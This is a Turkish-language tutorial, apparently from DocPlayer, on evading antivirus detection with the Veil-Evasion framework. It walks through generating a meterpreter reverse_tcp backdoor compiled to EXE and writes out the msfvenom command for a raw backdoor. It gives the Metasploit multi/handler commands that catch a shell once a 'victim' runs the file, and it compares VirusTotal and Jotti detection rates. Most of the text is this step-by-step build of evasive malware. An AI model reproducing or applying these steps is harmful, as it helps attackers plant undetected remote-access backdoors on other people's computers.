Anti-Virüs Atlatma 2. Kurulum

Benzer belgeler
Anti-Virus Atlatma Maligno Kullanımı

Anti-Virüs Atlatma 3. Kurulum

Anti-Virus Atlatma - Maligno Kullanımı

Anti-Virüs Atlatma 1. Resimden anlaşıldığı üzere 56 anti-virüs yazılımından 36 tanesi zararlı yazılım olduğunu doğrulamıştır.

Sonrasında bahsini ettiğimiz scripti çalıştıralım. Github linki burada.

Düşünüyorum! Biraz tarihçe.. Maalesef yanılıyorsunuz.

Sonrasında bahsini ettiğimiz scripti çalıştıralım. Github linki burada.

Anti-Virus Atlatma - Maligno Kullanımı

Armitage Nedir? Kullanım Öncesi

e-imzatr Kurulum Klavuzu

ADIM ADIM METASPLOIT METERPRETER SHELL DAVRANIŞ ANALİZİ

e-imzatr Kurulum Klavuzu

HAZIRLAYAN BEDRİ SERTKAYA Sistem Uzmanı CEH EĞİTMENİ

e-imzatr Kurulum Klavuzu

CYGWIN KURULUMU ve KULLANIMI

Metasploit Framework ile Güvenlik Denetimi. Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci at gamasec.net

1 OTOMASYON DÖNÜŞÜM İŞLEMLERİ

DESTEK DOKÜMANI. Ürün : Tiger Enterprise/ Tiger Plus/ Go Plus/Go Bölüm : Kurulum İşlemleri

Tarih: 2 Ağustos 2018 Son versiyon: 1.8. EndNote X9 Windows Multi/Site kurulum talimatları

CLIENT MAKİNELERE IBM SPSS Statistics 21 nin KURULMASI

LOGO SMART NAVIGATOR

Nagios Network Monitör Uygulaması -2

Trickbot Zararlı Yazılımı İnceleme Raporu

GĐRĐŞ. 1 Nisan 2009 tarihinde BDP programının yeni bir sürümü yayınlanmış ve bu sürümde yapılan değişikliklere

JasperReports Server ve Ireport raporlama Sistemi Kurulumu / Kullanımı 1. Bölüm 2. Bölüm 1- JasperReports Server ve Ireport Nedir?

MICROSOFT SQL SERVER SIZMA VE GÜVENLİK TESTİ ÇALIŞMALARI

SHOP INGENICO DOKUMANI

Bu makalede 2003 sunucu, Windows 2003 Server anlamına gelmektedir. Aşağıda yapılan işlemler 2003 R2 sunucu üzerinde denenmiş ve çalıştırılmıştır.

AKINSOFT. Eofis NetworkAdmin. AKINSOFT EOfis NetworkAdmin Kurulumu Bilgi Notu. Doküman Versiyon : Tarih : Copyright 2008 AKINSOFT

06 - Bilgi Toplama ve Sosyal Mühendislik

10.2 VERİYONUNUN KURULABİLMESİ İÇİN EĞER VARSA ÖNCEKİ. ArcGIS SÜRÜMLERİNİN PROGRAM EKLE-KALDIR SEÇENEĞİYLE

RPMNET WOLVOX REPORTER

MaestroPanel Kurulum

Turquaz Windows kurulum dökümanı. ftp://ftp.mirror.ac.uk/sites/ftp.postgresql.org/binary/v7.3.1/windows/pgsql731wina1.exe

Metasploit Framework ile Güvenlik Denetimi. Fatih Özavcı Bilgi Güvenliği Danışmanı

ZTerminal KULLANMA KILAVUZU. yazılımı. USB Terminal

Sqlmap pyhton dili yazılarak geliştirilmiş Sql injection için testerlara son derece yardımcı olan bir araçtır.


ETKİLEŞİMLİ TAHTA KORUMA SİSTEMİ KURULUM

ELEKTRONİK BELGE YÖNETİM SİSTEMİ KOORDİNATÖRLÜĞÜ (EBYS KOORDİNATÖRLÜĞÜ) ELEKTRONİK İMZA KURULUM AŞAMALARI VE EBYS PROGRAMI SİSTEM GEREKSİNİMLERİ

Windows XP Professional Kurulumu

ETA:SQL VE ETA:V.8-SQL PROGRAMLARINDA INSTALL ĐŞLEMĐNDE ANA BĐLGĐSAYAR KAVRAMI

WAMP SERVER KURULUMU

1- Mikro Yazılım e-defter Kullanıcılarımızın Dikkatine.

T. C. İSTANBUL TEKNİK ÜNİVERSİTESİ Bilişim Enstitüsü ENFORMASYON SİSTEMLERİNİN TASARIMI VE YÖNETİMİ

[ Web Uygulamalarında Kayank Kod Analizi II ] [ Mehmet Dursun INCE < mehmet.ince@intelrad.com > ] [ 10 Haziran 2013 ]

Sistem ve Ağ İzleme, Test Etme Araçları

Değerli Datasoft Kullanıcısı;

ASİSTAN v2 KULLANIM KILAVUZU

Kabuk Programlama (Bash)

EFe Event Management System

Nova Dental D Ana Makine Kurulum (Windows Server XP Home/Pro)

MeMu LABORATUVAR KONTROL SISTEMI BETA(Sürüm 0.2) YAZILIM TASARIM Mesut ERDEMİR Mustafa KARAS ( (

Denetim Masası/Programlar/Windows özelliklerini Aç/Kapat

SQL SERVER 2005 ENTEGRE SQL (VTY) VERİ TABANI YÖNETİM KURULUMU RESİMLİ ANLATIMI. Entegre SQL kurmadan önce SQLSERVER 2005,i kuralım öncelikle.

BITSTRIPS. Bitstrips nedir?

UBNT. UniFi mfi Ububntu. Ubuntu İşletim Sistemi ve UniFi/mFi Yazılımlarının Kurulumu

Wolvox Kapı Ekranı. AKINSOFT Wolvox Kapı Ekranı Yardım Dosyası. Doküman Versiyon :

27 Kasım Ekran 1: ETA:SQL Yazılım Güncelleme Uygulaması

BIND ile DNS Sunucu Kurulumu

Linux Ubuntu Kurulumu

Siteye girişte kullanıcı adı ve parola soran bir ekran karşına gelecektir.

Bilgi Güvenliği Denetim Sürecinde Özgür Yazılımlar. Fatih Özavcı Bilgi Güvenliği Danışmanı

Rezistivite Cihazı Kullanım Klavuzu

İSTANBUL ÜNİVERSİTESİ MÜHENDİSLİK FAKÜLTESİ BİLGİSAYAR MÜHENDİSLİĞİ BÖLÜMÜ SİSTEM PROGRAMLAMA DERSİ. Öğr.Gör. Mehmet DEMİR

Enlil programını açtığımızda karşımıza gelen ilk ekrandır.bu ekranda özel tanımlanmış kullanıcı kodu ve parola ile programa giriş sağlanmaktadır.

NPratik Yazılım Kurulum Kılavuzu. Yedekleme İşlemi

Metin Editörleri YRD. DOÇ. DR. ENGİN CEMAL MENGÜÇ. ALINTI:

BAY.t Entegre. Aşağıdaki script fiyat gör programının ayarlar sayfasındaki sorgu cümlesi alanına yapıştırılıp Sorguyu Db ye Yükle tıklanır

Windows Server 2012 Kurulum Hazırlıkları. Windows Server 2012 Kurulum Seçenekleri. Windows Server 2012 Kurulum Adımları. Full GUI Kurulum Seçeneği

Mpuantor 2.7 Client Kurulumu

FABREKA YAZILIM ELEKTRONİK DANIŞMANLIK TİC. LTD. ŞTİ.

SQL 2005 SQL STUDIO MANAGER ACP YAZILIMI KURULUM KILAVUZU

Ecofont Yazılım Kullanıcı Rehberi

İçindekiler Hitit Sayım Cihazı Kurulum ve Kullanım Kılavuzu... 2 Sayım Cihazı Kurulum İşlemleri... 2 Hitit Kurulum işlemleri...

Java JDK (Java Development Kit) Kurulumu:

Komut Satırının Gücü Adına!

Bo lu m 7: Hesap Tabloları

Exploit Geliştirme Altyapıları. Fatih Özavcı Bilgi Güvenliği Danışmanı

Zilabs VoIP uygulaması için ADSL Ayarları

C için tümleşik geliştirme ortamı (IDE) kurulumları

Uzak Masaüstü Lisans Server ı Aktive Etme

02 Temmuz İlgili Versiyon/lar: ETA:SQL, ETA:V.8-SQL. İlgili Modül/ler: Muhasebe IV

VEGAWIN BELGE CONVERTER

Teknoloji Özeti vspace Kurulum Değişiklikleri Windows Yükleyicisi.MSI

ETA:MOBİL KURULUM TALİMATI

Başlangıç Ayarları.

MY PANEL METER KULLANIM KILAVUZU

PERKON PDKS Kurulum ve hızlı başlangıç rehberi

Veri Tabanı Yönetim Sistemleri Bölüm - 02

Ağ Üzerinde MATLAB kurulum rehberi (Sunucu makine)

Yerel Ağlarda Port 139 ve Saldırı Yöntemi

Kılavuz içerisinde sisteme ait tüm özellikler anlatılmakta olup, yapacağınız konfigürasyonlar satın aldığınız lisans ile sınırlıdır.

Logo Mobile Kurulum ve Kullanım

NACA PROFİL AİLE GEOMETRİSİ HESAP PROGRAMI KULLANMA KILAVUZU

WOLVOX Mobil Satış PDA

Windows Hacking - II

Transkript:

Anti-Virüs Atlatma 2 Merhaba, bu yazımızda işleyeceğimiz araç Veil-evasion dur. Veil, açık kaynak kodlu olarak geliştirilen bir framework tür. Biz Veil framework içerisindeki anti-virüs atlatma aracı olan Veil-evasion u kullanacağız. Kurulum Linux üstüne kurulumu için mevcut kodlarının olduğu Github sayfasından (https://github.com/veil-framework/veil-evasion) indirip setup klasörünün altında bulunan setup.sh scripti ile kurulumu yapabilirsiniz. git clone https://github.com/veil-framework/veil-evasion.git cd Veil-Evasion/setup bash setup.sh -s

Veya depo dan direkt olarak bağımlılıklarıyla beraber kurulumunu yapabilirsiniz. Bunun için; apt-get install veil-evasion Çok sayıda paketi de kendisiyle beraber kuracaktır. İndirme ve kurulum işlemleri bittikten sonra terminal ekranında yapılandırılan konfigürasyonlar ve dosya yolları görünecektir. 32 bit bir işletim sisteminde daha rahat olacaktır kurulum işlemi. 64 bit sistemlerde kurulum yapıldığı zaman, gerekli yan uygulamalar ve wine 32bitlik sistemlere göre kurulacak ve yapılandırılacaktır, çoğu zaman da hata ile

karşılaşılabilmektedir. Konfigürasyon dosyası olan /etc/veil/settings.py içerisinde sisteminize uygun değişiklikleri yapabilirsiniz. Konfigürasyon dosyasında boş olarak görünen alan olan MSFVENOM_OPTIONS kısmı payload oluşturma sırasında ham bir payload yerine ek parametrelerle bir payload oluşturma imkanı sağlar. Örnek olarak oluşturma sırasında seçilecek bir encode tekniği kullanılarak birkaç iterasyondan geçirmesi sağlanabilir. Veil-evasion Kaynak koddan kurduysanız Veil-Evasion klasöründeki Veil- Evasion.py dosyasını çalıştırarak, depodan kurduysanız, komut satırından veil-evasion komutunu girerek başlatabilirsiniz. Başlangıç ekranından görüldüğü üzere şu an için kullandığımız versiyon olan 2.22.1 için kullanılabilecek 47 payload vardır.

Kullanım Kullanımı Metasploit ile benzerdir ve TAB ile tamamlama desteği vardır. Öncelikle list diyerek kullanılabilecek payloadları görelim. Aşağıda verilmiş olan resimden de anlaşılacağı üzere C, C#, GO, Python, Ruby, Powershell gibi dilleri kullanarak oluşturulabilen payloadları vardır. Bir payloadı seçmek için use komutunu kullanmanız gerekmektedir. use [Payload index numarası] veya use [Payload ismi] kullanım şekilleri ile kullanılabilir.

Örnek Örnek olarak Python ile yazılmış, meterpreter ile bize reverse_tcp bağlantı verecek olan payloadı kullanalım. Seçtiğimiz payload: python/meterpreter/rev_tcp, index numarası 31.Bu payloadı kullanmak için use 31 veya use python/meterpreter/rev_tcp diyoruz.

Gelen ekranda görüldüğü üzere birçok parametre vardır > Bunları teker teker açıklamak gerekise; ARCHITECTURE: Varsayılan olarak 32 bittir. Üretilecek olan zararlı yazılımın işlemci mimarisini belirtir. COMPILE_TO_EXE: Varsayılan olarak Y dir. Üretilecek olan zararlı yazılımın çalıştırılabilir bir dosya tipi olarak EXE ye dönüştürülmesini belirtir. EXPIRE_PAYLOAD: Opsiyonel olarak kullanılabilir bir alandır. Devre dışı bırakılacak özelliği tanımlamamızı sağlar. LHOST: Metasploit te dinlemeyi yapacağımız handler in IP adresi. LPORT: Metasploit te dinlemeyi yapacağımız handler in port adresi. USE_PYHERION: Varsayılan olarak N dir. Üretilecek zararlı yazılımın ek olarak Python un pyherion şifrelemesinden geçirileceğini belirtir. Msfvenom ile Backdoor Veil ile oluşturacağımız zararlı yazılım ile karşılaştırıp farkı görmek açısından önce Metasploit araçlarından olan msfvenom ile basit bir arka kapı oluşturalım. msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.17.7.132 LPORT=7788 -f exe -o rawbackdoor.exe Oluşturduğumuz zararlı yazılımı online bir anti-virüs tarama sitesi olan https://www.virustotal.com/ üstünde tarayalım ve

sonuçları görelim. Not: Bu tarz sistemler çıktılardan gelen sonuçları anti-virüs firmalarıyla paylaştığı ve imza tabanlı çalıştığı için, önceden yapılan taramalardan dolayı oluşturulan payloadları çok sayıda anti-virus yazılımı keşfedebilir düzeye gelmiştir. Bu yüzden anti-virus bypass uygulamalarında bir not olarak, online sistemlerde taratmayın diye not düşebilirler. Veil ile Backdoor Veil üstünde oluşturacağımız zararlı yazılımın, seçtiğimiz modüle göre, gerekli parametrelerini girdikten sonra generate komutu ile oluşturma işlemini başlatabiliriz. Generate dedikten sonra oluşturma işlemine başlamadan önce bize çıktı olarak vereceği dosyanın adını ne koyacağımızı soruyor. Bu değer default olarak payload olarak belirlenmiştir. Seçtiğimiz modülün parametrelerinden olan COMPILE_TO_EXE ye argüman olarak Y değerini verdiğimiz için oluşturalacak olan Python dosyasını exe olarak çalıştırılabilir dosya formatına dönüştürecektir. Burada oluşturulan çıktı dosyasının, çalıştırılabilir dosya formatına

dönüştürülmesi işlemi farklı python modülleri gerçekleşebilmektedir. Veil içinde default olarak Pyinstaller kullanılmaktadır. Bizde bu yazı sırasında 1 seçeneğinde bulunan Pyinstaller ı kullanacağız. 1 değerini girdikten sonra arka kapı oluşturma işlemi başlıyor. Zararlı yazılımın oluşturma işlemi tamamlandı. Verilen çıktıda, oluşturulan zararlı yazılım ile ilgili birkaç özellik bulunmaktadır. Bunlar, hangi dilde oluşturulduğu, payload olarak hangi metasploit payload ı kullanıldığı, kullanılan parametreler ve bunlara verilen değerler, payload dosyasının (zararlı yazılımımızın) bulunduğu konum ve handler dosyasının bulunduğu konum.

Metasploit Handler Resource Burada oluşturulan handler dosyası (resource), Metasploit tarafında gelen bağlantıları bekleme sırasında oluşturacağımız handler in script versiyonudur. Handler dosyası ile Metasploit tarafında, otomatik olarak komutları oluşturulan, oluşturduğumuz zararlı yazılıma göre parametreleri girip beklemeyi başlatabiliriz. Scripti Metasploit üstünde çalıştırmak için komut satırından msfconsole -r [Resource dosya konumu] veya açık olan Metasploit komut ekranında resource komutuyla şu şekilde yapılabilir resource [Resource dosya konumu]. Örnek bir kullanım aşağıda verilmiştir. Tarama sonucu Oluşturulan zararlı yazılımın, yapmamamız gereken, online tarama sonucu aşağıda ki resimlerde verilmiştir. İlk olarak popüler olan VirusTotal sayfasında yaptığımız taramanın sonucunu paylaşalım. Bir başka online tarama sayfası olan https://virusscan.jotti.org/ üstündeki taramanın sonucu ise aşağıdaki gibidir.

Jotti üzerinde ilk oluşturduğumuz msfvenom ile ham backdoorzararlı yazılımın tarama sonucunu da paylaşırsak aradaki farkı daha net görebilirsiniz. Reverse Bağlantı Oluşturduğumuz zararlı yazılım öncelikle Metasploit tarafında dinlemeye almamız gerekiyor, gelen bağlantıları yakalamak için. Bunu yukarıda belirttiğimiz resource dosyası ile veya kendimiz multi/handler modülünü kullanarak gerekli opsiyonları düzenleyip dinlemeyi başlatmamız gerek. Bunun için oluşturduğumuz payloada göre girilecek komutlar aşağıdaki gibidir. use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 172.17.7.132 set lport 7788 set exitonsession false exploit -j -z

Dinlemeyi başlattığımıza göre şimdi bekleme sırasında, kurbanın bir şekilde bunu açtığını varsayarsak, meterpreter shell için session ımız oluşuyor. Aktif sessionları listeleyip, bir tanesine geçiş yaptıktan sonra sistem hakkında kısa bir bilgi alma komutu çalıştıralım. Başka Bir Örnek Veil-evasion üstünde kullandığımız python/meterpreter/rev_tcp modülünden sonra kısaca başka bir modül için alınan sonuçları görelim. Kullanılan modül yine aynı aileden fakat farklı bir protokol ile çalışan python/meterpreter/rev_https modülü. Gerekli parametreleri düzenledikten sonra generate diyerek oluşturma işlemini başlatıyoruz.

Oluşturulan zararlı yazılımın, online tarama sonucu aşağıda ki resimlerde verilmiştir. İlk olarak popüler olan VirusTotal sayfasında yaptığımız taramanın sonucunu görelim. Bir diğer tarama sayfası olan Jotti den gelen sonucunu görelim.

2026 © DocPlayer.biz.tr Gizlilik Politikası | Hizmet koşulları | Geri bildirim